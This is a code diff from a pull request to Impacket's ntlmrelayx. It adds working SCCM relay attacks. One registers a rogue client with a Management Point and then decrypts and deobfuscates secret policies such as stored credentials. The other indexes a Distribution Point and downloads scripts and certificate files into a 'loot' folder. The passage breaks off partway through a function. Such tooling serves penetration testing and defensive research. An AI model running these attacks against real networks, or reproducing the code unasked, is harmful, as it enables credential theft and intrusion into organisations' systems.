### PR TITLE
SCCM Management Point and Distribution Point relay attacks implementation

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -212,7 +212,7 @@ def start_servers(options, threads):
         c.setIsSCCMPoliciesAttack(options.sccm_policies)
         c.setIsSCCMDPAttack(options.sccm_dp)
         c.setSCCMPoliciesOptions(options.sccm_policies_clientname, options.sccm_policies_sleep)
-        c.setSCCMDPOptions(options.sccm_dp_indexfile, options.sccm_dp_extensions, options.sccm_dp_files)
+        c.setSCCMDPOptions(options.sccm_dp_extensions, options.sccm_dp_files)
         
         c.setAltName(options.altname)
 
@@ -416,7 +416,6 @@ if __name__ == '__main__':
 
     sccmdpoptions = parser.add_argument_group("SCCM Distribution Point attack options")
     sccmdpoptions.add_argument('--sccm-dp', action='store_true', required=False, help='Enable SCCM Distribution Point attack. Perform package file dump from an SCCM Distribution Point. Expects as target \'http://<DP>/sms_dp_smspkg$/Datalib\'')
-    sccmdpoptions.add_argument('--sccm-dp-indexfile', action='store', required=False, help='The path to the index.json file produced by a previous run of the SCCM DP attack. Providing this argument will skip file indexing')
     sccmdpoptions.add_argument('--sccm-dp-extensions', action='store', required=False, help='A custom list of extensions to look for when downloading files from the SCCM Distribution Point. If not provided, defaults to .ps1,.bat,.xml,.txt,.pfx')
     sccmdpoptions.add_argument('--sccm-dp-files', action='store', required=False, help='The path to a file containing a list of specific URLs to download from the Distribution Point, instead of downloading by extensions. Providing this argument will skip file indexing')
 

--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -44,6 +44,7 @@ try:
     from urllib.request import ProxyHandler, build_opener, Request
 except ImportError:
     from urllib2 import ProxyHandler, build_opener, Request
+from urllib.parse import urlparse
 
 import json
 from time import sleep
@@ -208,7 +209,11 @@ def start_servers(options, threads):
         c.setIsShadowCredentialsAttack(options.shadow_credentials)
         c.setShadowCredentialsOptions(options.shadow_target, options.pfx_password, options.export_type,
                                       options.cert_outfile_path)
-
+        c.setIsSCCMPoliciesAttack(options.sccm_policies)
+        c.setIsSCCMDPAttack(options.sccm_dp)
+        c.setSCCMPoliciesOptions(options.sccm_policies_clientname, options.sccm_policies_sleep)
+        c.setSCCMDPOptions(options.sccm_dp_indexfile, options.sccm_dp_extensions, options.sccm_dp_files)
+        
         c.setAltName(options.altname)
 
         #If the redirect option is set, configure the HTTP server to redirect targets to SMB
@@ -403,6 +408,18 @@ if __name__ == '__main__':
                                    help='choose to export cert+private key in PEM or PFX (i.e. #PKCS12) (default: PFX))')
     shadowcredentials.add_argument('--cert-outfile-path', action='store', required=False, help='filename to store the generated self-signed PEM or PFX certificate and key')
 
+    # SCCM policies options
+    sccmpoliciesoptions = parser.add_argument_group("SCCM Policies attack options")
+    sccmpoliciesoptions.add_argument('--sccm-policies', action='store_true', required=False, help='Enable SCCM policies attack. Performs SCCM secret policies dump from a Management Point by registering a device. Works best when relaying a machine account. Expects as target \'http://<MP>/ccm_system_windowsauth/request\'')
+    sccmpoliciesoptions.add_argument('--sccm-policies-clientname', action='store', required=False, help='The name of the client that will be registered in order to dump secret policies. Defaults to the relayed account\'s name')
+    sccmpoliciesoptions.add_argument('--sccm-policies-sleep', action='store', required=False, help='The number of seconds to sleep after the client registration before requesting secret policies')
+
+    sccmdpoptions = parser.add_argument_group("SCCM Distribution Point attack options")
+    sccmdpoptions.add_argument('--sccm-dp', action='store_true', required=False, help='Enable SCCM Distribution Point attack. Perform package file dump from an SCCM Distribution Point. Expects as target \'http://<DP>/sms_dp_smspkg$/Datalib\'')
+    sccmdpoptions.add_argument('--sccm-dp-indexfile', action='store', required=False, help='The path to the index.json file produced by a previous run of the SCCM DP attack. Providing this argument will skip file indexing')
+    sccmdpoptions.add_argument('--sccm-dp-extensions', action='store', required=False, help='A custom list of extensions to look for when downloading files from the SCCM Distribution Point. If not provided, defaults to .ps1,.bat,.xml,.txt,.pfx')
+    sccmdpoptions.add_argument('--sccm-dp-files', action='store', required=False, help='The path to a file containing a list of specific URLs to download from the Distribution Point, instead of downloading by extensions. Providing this argument will skip file indexing')
+
     try:
        options = parser.parse_args()
     except Exception as e:
@@ -412,6 +429,18 @@ if __name__ == '__main__':
     if options.rpc_use_smb and not options.auth_smb:
        logging.error("Set -auth-smb to relay DCE/RPC to SMB pipes")
        sys.exit(1)
+    
+    # Ensuring the correct target is set when performing SCCM policies attack
+    if options.sccm_policies is True and not options.target.rstrip('/').endswith("/ccm_system_windowsauth/request"):
+        logging.error("When performing SCCM policies attack, the Management Point authenticated device registration endpoint should be provided as target")
+        logging.error(f"For instance: {urlparse(options.target).scheme}://{urlparse(options.target).netloc}/ccm_system_windowsauth/request")
+        sys.exit(1)
+
+    # Ensuring the correct target is set when performing SCCM DP attack
+    if options.sccm_dp is True and not options.target.rstrip('/').endswith("/sms_dp_smspkg$/Datalib"):
+        logging.error("When performing SCCM DP attack, the Distribution Point Datalib endpoint should be provided as target")
+        logging.error(f"For instance: {urlparse(options.target).scheme}://{urlparse(options.target).netloc}/sms_dp_smspkg$/Datalib")
+        sys.exit(1)
 
     # Init the example's logger theme
     logger.init(options.ts)

--- a/impacket/examples/ntlmrelayx/attacks/httpattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/httpattack.py
@@ -19,11 +19,15 @@
 
 from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
 from impacket.examples.ntlmrelayx.attacks.httpattacks.adcsattack import ADCSAttack
+from impacket.examples.ntlmrelayx.attacks.httpattacks.sccmpoliciesattack import SCCMPoliciesAttack
+from impacket.examples.ntlmrelayx.attacks.httpattacks.sccmdpattack import SCCMDPAttack
+
+
 
 PROTOCOL_ATTACK_CLASS = "HTTPAttack"
 
 
-class HTTPAttack(ProtocolAttack, ADCSAttack):
+class HTTPAttack(ProtocolAttack, ADCSAttack, SCCMPoliciesAttack, SCCMDPAttack):
     """
     This is the default HTTP attack. This attack only dumps the root page, though
     you can add any complex attack below. self.client is an instance of urrlib.session
@@ -36,10 +40,15 @@ class HTTPAttack(ProtocolAttack, ADCSAttack):
 
         if self.config.isADCSAttack:
             ADCSAttack._run(self)
+        elif self.config.isSCCMPoliciesAttack:
+            SCCMPoliciesAttack._run(self)
+        elif self.config.isSCCMDPAttack:
+            SCCMDPAttack._run(self)
         else:
             # Default action: Dump requested page to file, named username-targetname.html
             # You can also request any page on the server via self.client.session,
             # for example with:
+            print("DEFAULT CASE")
             self.client.request("GET", "/")
             r1 = self.client.getresponse()
             print(r1.status, r1.reason)

--- a/impacket/examples/ntlmrelayx/attacks/httpattacks/sccmdpattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/httpattacks/sccmdpattack.py
@@ -1,0 +1,233 @@
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# SECUREAUTH LABS. Copyright (C) 2022 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   SCCM relay attack to dump files from Distribution Points
+# 
+# Authors:
+#    Quentin Roland(@croco_byte)
+#    Based on SCCMSecrets.py (https://github.com/synacktiv/SCCMSecrets/)
+#    Inspired by the initial pull request of Alberto Rodriguez (@__ar0d__)
+#    Credits to @badsectorlabs for the datalib file indexing method
+
+import os
+import json
+import urllib
+
+from html.parser                                        import HTMLParser
+from datetime                                           import datetime
+from impacket                                           import LOG
+
+
+def print_tree(d, out, prefix=""):
+    keys = list(d.keys())
+    for i, key in enumerate(keys):
+        is_last = (i == len(keys) - 1)
+        if isinstance(d[key], dict):
+            out.write(f"{prefix}{'└── ' if is_last else '├── '}{key}/\n")
+            new_prefix = f"{prefix}{'    ' if is_last else '│   '}"
+            print_tree(d[key], out, new_prefix)
+        else:
+            out.write(f"{prefix}{'└── ' if is_last else '├── '}{key}\n")
+
+class PackageIDsRetriever(HTMLParser):
+    def __init__(self):
+        super().__init__()
+        self.package_ids = set()
+
+    def handle_starttag(self, tag, attrs):
+        if tag == 'a':
+            for attr in attrs:
+                if attr[0] == 'href':
+                    href = attr[1]
+                    parts = href.split('/')
+                    last_part = parts[-1].strip()
+                    if not last_part.endswith('.INI'):
+                        self.package_ids.add(last_part)
+
+class FileAndDirsRetriever(HTMLParser):
+    def __init__(self):
+        super().__init__()
+        self.links = []
+        self.previous_data = ""
+
+    def handle_starttag(self, tag, attrs):
+        self.current_tag = tag
+        if tag == 'a':
+            href = dict(attrs).get('href')
+            if href:
+                self.links.append((href, self.previous_data))
+
+    def handle_data(self, data):
+        self.previous_data = data.strip()
+
+
+
+class SCCMDPAttack:
+    max_recursion_depth = 5
+    DP_DOWNLOAD_HEADERS = {
+            "User-Agent": "SMS CCM 5.0 TS"
+    }
+
+    def _run(self):
+        LOG.info("Starting SCCM DP attack")
+
+        distribution_point = f"{'https' if self.client.port == 443 else 'http'}://{self.client.host}"
+        loot_dir = f"{self.client.host}_{datetime.now().strftime('%Y%m%d%H%M%S')}_sccm_dp_loot"
+        if self.config.SCCMDPExtensions == None:
+            self.config.SCCMDPExtensions = [".ps1", ".bat", ".xml", ".txt", ".pfx"]
+        elif not self.config.SCCMDPExtensions.strip():
+            self.config.SCCMDPExtensions = []
+        else:
+            self.config.SCCMDPExtensions = [x.strip() for x in self.config.SCCMDPExtensions.split(',')]
+
+        try:
+            os.makedirs(loot_dir, exist_ok=True)
+            LOG.info(f"Loot directory is: {loot_dir}")
+        except Exception as err:
+            LOG.error(f"Error creating base output directory: {err}")
+            return
+
+
+        # If a set of URLs was provided or an existing index file, do not reindex
+        if self.config.SCCMDPFiles is None and self.config.SCCMDPIndexfile is None:
+            try:
+                LOG.debug("Performing file indexing from Datalib")
+                self.fetchPackageIDsFromDatalib(distribution_point, loot_dir)
+                LOG.info("File indexing from Datalib performed")
+            except Exception as e:
+                LOG.error(f"Encountered an error while indexing files from Distribution Point: {e}")
+                return
+
+        try:
+            LOG.debug("Performing file download")
+            self.downloadTargetFiles(loot_dir, self.config.SCCMDPExtensions, self.config.SCCMDPIndexfile, self.config.SCCMDPFiles)
+            LOG.info("File download performed")
+        except Exception as e:
+            LOG.error(f"Encountered an error while downloading target files: {e}")
+            return
+        
+        LOG.info(f"DONE - attack finished. Check loot directory {loot_dir}")
+
+
+
+
+    def recursiveFileExtract(self, data, extensions):
+        to_download = []
+        if isinstance(data, dict):
+            for key, value in data.items():
+                if value is None and key.endswith(tuple(extensions)):
+                    to_download.append(key)
+                else:
+                    to_download.extend(self.recursiveFileExtract(data[key], extensions))
+        return to_download
+    
+    def downloadFiles(self, loot_dir, package, files):
+        for file in files:
+            try:
+                parsed_url = urllib.parse.urlparse(file)
+                filename = urllib.parse.unquote(parsed_url.path.split('/')[-1])
+                self.client.request("GET", file, headers=self.DP_DOWNLOAD_HEADERS)
+                r = self.client.getresponse().read()
+                output_file = f"{loot_dir}/{filename}"
+                with open(output_file, 'wb') as f:
+                    f.write(r)
+                LOG.info(f"Package {package} - downloaded file {filename}")
+            except Exception as e:
+                LOG.error(f"[!] Error when handling package {file}")
+                LOG.error(f"{e}")
+
+
+    def downloadTargetFiles(self, loot_dir, extensions, index_file, files):
+        if files is not None:
+            with open(files, 'r') as f:
+                to_download = f.read().splitlines()
+                os.makedirs(f'{loot_dir}/files')
+                self.downloadFiles(f'{loot_dir}/files', 'N/A', to_download)
+        else:
+            if index_file is not None:
+                with open(index_file, 'r') as f:
+                    content = json.loads(f.read())
+            else:
+                with open(f'{loot_dir}/index.json', 'r') as f:
+                    content = json.loads(f.read())
+            for key, value in content.items():
+                to_download = self.recursiveFileExtract(value, extensions)
+                if len(to_download) == 0:
+                    continue
+                if not os.path.exists(f'{loot_dir}/{key}'):
+                    os.makedirs(f'{loot_dir}/{key}')
+
+                self.downloadFiles(f'{loot_dir}/{key}', key, to_download)
+
+
+    def recursivePackageDirectoryFetch(self, object, directory, depth):
+        depth += 1
+
+        self.client.request("GET", directory, headers=self.DP_DOWNLOAD_HEADERS)
+        r = self.client.getresponse().read()
+
+        parser = FileAndDirsRetriever()
+        parser.feed(r.decode())
+        
+        files = []
+        for href in parser.links:
+            if '<dir>' in href[1]:
+                if depth <= self.max_recursion_depth:
+                    object[href[0]] = {}
+                    self.recursivePackageDirectoryFetch(object[href[0]], href[0], depth)
+                else:
+                    object[href[0]] = "Maximum recursion depth reached"
+            else:
+                files.append(href[0])
+        for file in files:
+            object[file] = None
+
+
+    def fetchPackageIDsFromDatalib(self, distribution_point, loot_dir):
+        package_ids = set()
+        self.client.request("GET", f"{distribution_point}/sms_dp_smspkg$/Datalib", headers=self.DP_DOWNLOAD_HEADERS)
+        r = self.client.getresponse().read()
+        packageIDs_parser = PackageIDsRetriever()
+        packageIDs_parser.feed(r.decode())
+        package_ids = packageIDs_parser.package_ids
+
+            
+        LOG.info(f"Found {len(package_ids)} packages")
+        LOG.debug(package_ids)
+
+        results = {}
+        for package_id in package_ids:
+            fileDir_parser = FileAndDirsRetriever()
+            self.client.request("GET", f"{distribution_point}/sms_dp_smspkg$/{package_id}", headers=self.DP_DOWNLOAD_HEADERS)
+            r = self.client.getresponse().read()
+            fileDir_parser.feed(r.decode())
+
+            files = []
+            directories = []
+            for href in fileDir_parser.links:
+                if '<dir>' in href[1]:
+                    directories.append(href[0])
+                else:
+                    files.append(href[0])
+
+            results[package_id] = {}
+            for directory in directories:
+                results[package_id][directory] = {}
+            for file in files:
+                results[package_id][file] = None
+        
+        for package in results.keys():
+            for item in results[package].keys():
+                if isinstance(results[package][item], dict):
+                    self.recursivePackageDirectoryFetch(results[package][item], item, 0)
+        
+        with open(f'{loot_dir}/index.json', 'w') as f:
+            f.write(json.dumps(results))
+        with open(f'{loot_dir}/index.txt', 'w') as out:
+            print_tree(results, out)

--- a/impacket/examples/ntlmrelayx/attacks/httpattacks/sccmpoliciesattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/httpattacks/sccmpoliciesattack.py
@@ -1,0 +1,578 @@
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# SECUREAUTH LABS. Copyright (C) 2022 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   SCCM relay attack to register a device and dump all secret policies
+# 
+# Authors:
+#    Quentin Roland(@croco_byte)
+#    Based on SCCMSecrets.py (https://github.com/synacktiv/SCCMSecrets/)
+#    Inspired by xpn's work (@xpn)
+
+import os
+import zlib
+import json
+import base64
+import string
+import random
+import binascii
+import xml.etree.ElementTree                            as ET
+
+from time                                               import sleep
+from datetime                                           import datetime, timedelta
+from impacket                                           import LOG
+from cryptography                                       import x509
+from cryptography.x509.oid                              import NameOID
+from cryptography.x509                                  import ObjectIdentifier
+from cryptography.hazmat.primitives                     import serialization, hashes, padding
+from cryptography.hazmat.primitives.asymmetric          import rsa
+from cryptography.hazmat.primitives.asymmetric.padding  import PKCS1v15, OAEP, MGF1
+from cryptography.hazmat.primitives.hashes              import SHA1
+from cryptography.hazmat.primitives.ciphers             import Cipher, algorithms, modes
+from cryptography.hazmat.backends                       import default_backend
+
+from pyasn1_modules                                     import rfc5652
+from pyasn1.codec.der.decoder                           import decode
+
+# Request templates
+registrationRequestTemplate = """<Data HashAlgorithm="1.2.840.113549.1.1.11" SMSID="" RequestType="Registration" TimeStamp="{date}">
+<AgentInformation AgentIdentity="CCMSetup.exe" AgentVersion="5.00.8325.0000" AgentType="0" />
+<Certificates><Encryption Encoding="HexBinary" KeyType="1">{encryption}</Encryption><Signing Encoding="HexBinary" KeyType="1">{signature}</Signing></Certificates>
+<DiscoveryProperties><Property Name="Netbios Name" Value="{client}" />
+<Property Name="FQ Name" Value="{clientfqdn}" />
+<Property Name="Locale ID" Value="2057" />
+<Property Name="InternetFlag" Value="0" />
+</DiscoveryProperties></Data>"""
+registrationRequestWrapperTemplate = "<ClientRegistrationRequest>{data}<Signature><SignatureValue>{signature}</SignatureValue></Signature></ClientRegistrationRequest>\x00"
+
+SCCMHeaderTemplate = """<Msg ReplyCompression="zlib" SchemaVersion="1.1"><Body Type="ByteRange" Length="{bodylength}" Offset="0" /><CorrelationID>{{00000000-0000-0000-0000-000000000000}}</CorrelationID><Hooks><Hook3 Name="zlib-compress" /></Hooks><ID>{{5DD100CD-DF1D-45F5-BA17-A327F43465F8}}</ID><Payload Type="inline" /><Priority>0</Priority><Protocol>http</Protocol><ReplyMode>Sync</ReplyMode><ReplyTo>direct:{client}:SccmMessaging</ReplyTo><SentTime>{date}</SentTime><SourceHost>{client}</SourceHost><TargetAddress>mp:MP_ClientRegistration</TargetAddress><TargetEndpoint>MP_ClientRegistration</TargetEndpoint><TargetHost>{sccmserver}</TargetHost><Timeout>60000</Timeout></Msg>"""
+policyRequestHeaderTemplate = """<Msg ReplyCompression="zlib" SchemaVersion="1.1"><Body Type="ByteRange" Length="{bodylength}" Offset="0" /><CorrelationID>{{00000000-0000-0000-0000-000000000000}}</CorrelationID><Hooks><Hook2 Name="clientauth"><Property Name="AuthSenderMachine">{client}</Property><Property Name="PublicKey">{publickey}</Property><Property Name="ClientIDSignature">{clientIDsignature}</Property><Property Name="PayloadSignature">{payloadsignature}</Property><Property Name="ClientCapabilities">NonSSL</Property><Property Name="HashAlgorithm">1.2.840.113549.1.1.11</Property></Hook2><Hook3 Name="zlib-compress" /></Hooks><ID>{{041A35B4-DCEE-4F64-A978-D4D489F47D28}}</ID><Payload Type="inline" /><Priority>0</Priority><Protocol>http</Protocol><ReplyMode>Sync</ReplyMode><ReplyTo>direct:{client}:SccmMessaging</ReplyTo><SentTime>{date}</SentTime><SourceID>GUID:{clientid}</SourceID><SourceHost>{client}</SourceHost><TargetAddress>mp:MP_PolicyManager</TargetAddress><TargetEndpoint>MP_PolicyManager</TargetEndpoint><TargetHost>{sccmserver}</TargetHost><Timeout>60000</Timeout></Msg>"""
+policyRequestTemplate = """<RequestAssignments SchemaVersion="1.00" ACK="false" RequestType="Always"><Identification><Machine><ClientID>GUID:{clientid}</ClientID><FQDN>{clientfqdn}</FQDN><NetBIOSName>{client}</NetBIOSName><SID /></Machine><User /></Identification><PolicySource>SMS:PRI</PolicySource><Resource ResourceType="Machine" /><ServerCookie /></RequestAssignments>"""
+reportBody = """<Report><ReportHeader><Identification><Machine><ClientInstalled>0</ClientInstalled><ClientType>1</ClientType><ClientID>GUID:{clientid}</ClientID><ClientVersion>5.00.8325.0000</ClientVersion><NetBIOSName>{client}</NetBIOSName><CodePage>850</CodePage><SystemDefaultLCID>2057</SystemDefaultLCID><Priority /></Machine></Identification><ReportDetails><ReportContent>Inventory Data</ReportContent><ReportType>Full</ReportType><Date>{date}</Date><Version>1.0</Version><Format>1.1</Format></ReportDetails><InventoryAction ActionType="Predefined"><InventoryActionID>{{00000000-0000-0000-0000-000000000003}}</InventoryActionID><Description>Discovery</Description><InventoryActionLastUpdateTime>{date}</InventoryActionLastUpdateTime></InventoryAction></ReportHeader><ReportBody /></Report>"""
+
+OID_MAPPING = {
+    '1.2.840.113549.3.7': "des-ede3-cbc",
+
+    # PKCS1 v2.2
+    '1.2.840.113549.1.1.1': 'rsaEncryption',
+    '1.2.840.113549.1.1.2': 'md2WithRSAEncryption',
+    '1.2.840.113549.1.1.3': 'md4withRSAEncryption',
+    '1.2.840.113549.1.1.4': 'md5WithRSAEncryption',
+    '1.2.840.113549.1.1.5': 'sha1-with-rsa-signature',
+    '1.2.840.113549.1.1.6': 'rsaOAEPEncryptionSET',
+    '1.2.840.113549.1.1.7': 'id-RSAES-OAEP',
+    '1.2.840.113549.1.1.8': 'id-mgf1',
+    '1.2.840.113549.1.1.9': 'id-pSpecified',
+    '1.2.840.113549.1.1.10': 'rsassa-pss',
+
+    # AES
+    '2.16.840.1.101.3.4.1.41': 'aes256_ecb',
+    '2.16.840.1.101.3.4.1.42': 'aes256_cbc',
+    '2.16.840.1.101.3.4.1.43': 'aes256_ofb',
+    '2.16.840.1.101.3.4.1.44': 'aes256_cfb',
+    '2.16.840.1.101.3.4.1.45': 'aes256_wrap',
+    '2.16.840.1.101.3.4.1.46': 'aes256_gcm',
+    '2.16.840.1.101.3.4.1.47': 'aes256_ccm',
+    '2.16.840.1.101.3.4.1.48': 'aes256_wrap_pad'
+}
+
+
+
+
+### Cryptography utility functions ###
+def createCertificate(privatekey):
+    subject = issuer = x509.Name([
+        x509.NameAttribute(NameOID.COMMON_NAME, "ConfigMgr Client"),
+    ])
+    cert = x509.CertificateBuilder().subject_name(
+        subject
+    ).issuer_name(
+        issuer
+    ).public_key(
+        privatekey.public_key()
+    ).serial_number(
+        x509.random_serial_number()
+    ).not_valid_before(
+        datetime.utcnow() - timedelta(days=2)
+    ).not_valid_after(
+        datetime.utcnow() + timedelta(days=365)
+    ).add_extension(
+        x509.KeyUsage(digital_signature=True, key_encipherment=False, key_cert_sign=False,
+                                key_agreement=False, content_commitment=False, data_encipherment=True,
+                                crl_sign=False, encipher_only=False, decipher_only=False),
+        critical=False,
+    ).add_extension(
+        x509.ExtendedKeyUsage([ObjectIdentifier("1.3.6.1.4.1.311.101.2"), ObjectIdentifier("1.3.6.1.4.1.311.101")]),
+        critical=False,
+    ).sign(privatekey, hashes.SHA256())
+
+    return cert
+
+def createPrivateKey():
+    privatekey = rsa.generate_private_key(public_exponent=65537, key_size=2048)
+    return privatekey
+
+def SCCMSign(private_key, data):
+        signature = private_key.sign(data, PKCS1v15(), hashes.SHA256())
+        signature_rev = bytearray(signature)
+        signature_rev.reverse()
+        return bytes(signature_rev)
+
+
+def buildMSPublicKeyBlob(private_key):
+    blobHeader = b"\x06\x02\x00\x00\x00\xA4\x00\x00\x52\x53\x41\x31\x00\x08\x00\x00\x01\x00\x01\x00"
+    blob = blobHeader + private_key.public_key().public_numbers().n.to_bytes(int(private_key.key_size / 8), byteorder="little")
+    return blob.hex().upper()
+
+
+### Various utility functions ###
+def encodeUTF16StripBOM(data):
+    return data.encode('utf-16')[2:]
+
+def cleanJunkInXML(xml_string):
+    root_end = xml_string.rfind('</')
+    if root_end != -1:
+        root_end = xml_string.find('>', root_end) + 1
+        clean_xml_string = xml_string[:root_end]
+        return clean_xml_string
+    return xml_string
+
+
+### Client registration utility functions ###
+def generateRegistrationRequestPayload(management_point, public_key, private_key, client_name):
+    registrationRequest = registrationRequestTemplate.format(
+        date=datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ"),
+        encryption=public_key,
+        signature=public_key,
+        client=client_name.split('.')[0],
+        clientfqdn=client_name
+    )
+
+    signature = SCCMSign(private_key, encodeUTF16StripBOM(registrationRequest)).hex().upper()
+    registrationRequestWrapper = registrationRequestWrapperTemplate.format(
+     data=registrationRequest,
+     signature=signature
+    )
+    registrationRequestWrapper = encodeUTF16StripBOM(registrationRequestWrapper) + "\r\n".encode('ascii')
+
+    registrationRequestHeader = SCCMHeaderTemplate.format(
+        bodylength=len(registrationRequestWrapper)-2,
+        client=client_name,
+        date=datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ"),
+        sccmserver=management_point
+    )
+
+    final_body = "--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: text/plain; charset=UTF-16\r\n\r\n".encode('ascii')
+    final_body += registrationRequestHeader.encode('utf-16') + "\r\n--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: application/octet-stream\r\n\r\n".encode('ascii')
+    final_body += zlib.compress(registrationRequestWrapper) + "\r\n--aAbBcCdDv1234567890VxXyYzZ--".encode('ascii')
+
+    return final_body
+
+
+### Policies request utility functions ###
+def generatePoliciesRequestPayload(management_point, private_key, client_guid, client_name):
+    policyRequest = encodeUTF16StripBOM(policyRequestTemplate.format(
+        clientid=client_guid,
+        clientfqdn=client_name,
+        client=client_name.split('.')[0]
+    )) + b"\x00\x00\r\n"
+    policyRequestCompressed = zlib.compress(policyRequest)
+
+    MSPublicKey = buildMSPublicKeyBlob(private_key)
+    clientID = f"GUID:{client_guid.upper()}"
+    clientIDSignature = SCCMSign(private_key, encodeUTF16StripBOM(clientID) + "\x00\x00".encode('ascii')).hex().upper()
+    policyRequestSignature = SCCMSign(private_key, policyRequestCompressed).hex().upper()
+
+    policyRequestHeader = policyRequestHeaderTemplate.format(
+        bodylength=len(policyRequest)-2, 
+        sccmserver=management_point, 
+        client=client_name.split('.')[0],
+        publickey=MSPublicKey, 
+        clientIDsignature=clientIDSignature, 
+        payloadsignature=policyRequestSignature, 
+        clientid=client_guid, 
+        date=datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ")
+    )
+
+    final_body = "--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: text/plain; charset=UTF-16\r\n\r\n".encode('ascii')
+    final_body += policyRequestHeader.encode('utf-16') + "\r\n--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: application/octet-stream\r\n\r\n".encode('ascii')
+    final_body += policyRequestCompressed + "\r\n--aAbBcCdDv1234567890VxXyYzZ--".encode('ascii')
+
+    return final_body
+
+
+### Secret policies utility functions ###
+def decryptKeyOAEP(encrypted_key, private_key):
+    return private_key.decrypt(encrypted_key, OAEP(mgf=MGF1(algorithm=SHA1()), algorithm=SHA1(), label=None))
+
+def decryptKeyRSA(encrypted_key, private_key):
+    return private_key.decrypt(encrypted_key, PKCS1v15())
+
+def decryptBodyTripleDES(body, plaintextkey, iv):
+    cipher = Cipher(algorithms.TripleDES(plaintextkey), modes.CBC(iv), backend=default_backend())
+    decryptor = cipher.decryptor()
+    plaintext = decryptor.update(body) + decryptor.finalize()
+    return plaintext.decode('utf-16le')
+
+def decryptBodyAESCBC(body, plaintextkey, iv):
+    cipher = Cipher(algorithms.AES(plaintextkey), modes.CBC(iv), backend=default_backend())
+    decryptor = cipher.decryptor()
+    plaintext = decryptor.update(body) + decryptor.finalize()
+    return plaintext.decode('utf-16le')
+
+def decryptSecretPolicy(policy_response, private_key):
+    content, _ = decode(policy_response, asn1Spec=rfc5652.ContentInfo())
+    content, _ = decode(content.getComponentByName('content'), asn1Spec=rfc5652.EnvelopedData())
+    encryptedRSAKey = content['recipientInfos'][0]['ktri']['encryptedKey'].asOctets()
+    keyEncryptionOID = str(content['recipientInfos'][0]['ktri']['keyEncryptionAlgorithm']['algorithm'])
+    iv = content['encryptedContentInfo']['contentEncryptionAlgorithm']['parameters'].asOctets()[2:]
+    body = content['encryptedContentInfo']['encryptedContent'].asOctets()
+    bodyEncryptionOID = str(content['encryptedContentInfo']['contentEncryptionAlgorithm']['algorithm'])
+
+    try:
+        if OID_MAPPING[keyEncryptionOID] == 'rsaEncryption':
+            plaintextkey = decryptKeyRSA(encryptedRSAKey, private_key)
+        elif OID_MAPPING[keyEncryptionOID] == 'id-RSAES-OAEP':
+            plaintextkey = decryptKeyOAEP(encryptedRSAKey, private_key)
+        else:
+            LOG.error(f"Key decryption algorithm {OID_MAPPING[keyEncryptionOID]} is not currently implemented.")
+            return
+    except KeyError as e:
+        LOG.error(f"[-] Unknown key decryption algorithm.")
+        return
+
+    try:
+        if OID_MAPPING[bodyEncryptionOID] == 'des-ede3-cbc':
+            plaintextbody = decryptBodyTripleDES(body, plaintextkey, iv)
+        elif OID_MAPPING[bodyEncryptionOID] == 'aes256_cbc':
+            plaintextbody = decryptBodyAESCBC(body, plaintextkey, iv)
+        else:
+            LOG.error(f"[-] Body decryption algorithm {OID_MAPPING[bodyEncryptionOID]} is not currently implemented.")
+            return
+    except KeyError as e:
+        LOG.error(f"[-] Unknown body decryption algorithm.")
+        return
+
+    return plaintextbody
+
+def mscrypt_derive_key_sha1(secret:bytes):
+    # Implementation of CryptDeriveKey(prov, CALG_3DES, hash, 0, &cryptKey);
+    buf1 = bytearray([0x36] * 64)
+    buf2 = bytearray([0x5C] * 64)
+
+    digest = hashes.Hash(hashes.SHA1(), backend=default_backend())
+    digest.update(secret)
+    hash_ = digest.finalize()
+
+    for i in range(len(hash_)):
+        buf1[i] ^= hash_[i]
+        buf2[i] ^= hash_[i]
+
+    digest1 = hashes.Hash(hashes.SHA1(), backend=default_backend())
+    digest1.update(buf1)
+    hash1 = digest1.finalize()
+
+    digest2 = hashes.Hash(hashes.SHA1(), backend=default_backend())
+    digest2.update(buf2)
+    hash2 = digest2.finalize()
+
+    derived_key = hash1 + hash2[:4]
+    return derived_key
+
+def deobfuscateSecretPolicyBlob(output):
+    if isinstance(output, str):
+        output = bytes.fromhex(output)
+    
+    data_length = int.from_bytes(output[52:56], 'little')
+    buffer = output[64:64+data_length]
+
+    key = mscrypt_derive_key_sha1(output[4:4+0x28])
+    iv = bytes([0] * 8)
+    cipher = Cipher(algorithms.TripleDES(key), modes.CBC(iv), backend=default_backend())
+    decryptor = cipher.decryptor()
+    decrypted_data = decryptor.update(buffer) + decryptor.finalize()
+
+    padder = padding.PKCS7(64).unpadder() # 64 is the block size in bits for DES3
+    decrypted_data = padder.update(decrypted_data) + padder.finalize()
+
+    try:
+        decrypted_data = decrypted_data.decode('utf-16-le')
+    except:
+        decrypted_data = decrypted_data.hex()
+    return decrypted_data
+
+
+def parsePoliciesFlags(policyFlagValue):
+    policyFlagValue = int(policyFlagValue)
+    NONE                        = 0b0000000
+    TASKSEQUENCE                = 0b0000001
+    REQUIRESAUTH                = 0b0000010
+    SECRET                      = 0b0000100
+    INTRANETONLY                = 0b0001000
+    PERSISTWHOLEPOLICY          = 0b0010000
+    AUTHORIZEDDYNAMICDOWNLOAD   = 0b0100000
+    COMPRESSED                  = 0b1000000 
+
+    result = []
+    if policyFlagValue & TASKSEQUENCE != 0:
+        result.append("TASKSEQUENCE")
+    if policyFlagValue & REQUIRESAUTH != 0:
+        result.append("REQUIRESAUTH")
+    if policyFlagValue & SECRET != 0:
+        result.append("SECRET")
+    if policyFlagValue & INTRANETONLY != 0:
+        result.append("INTRANETONLY")
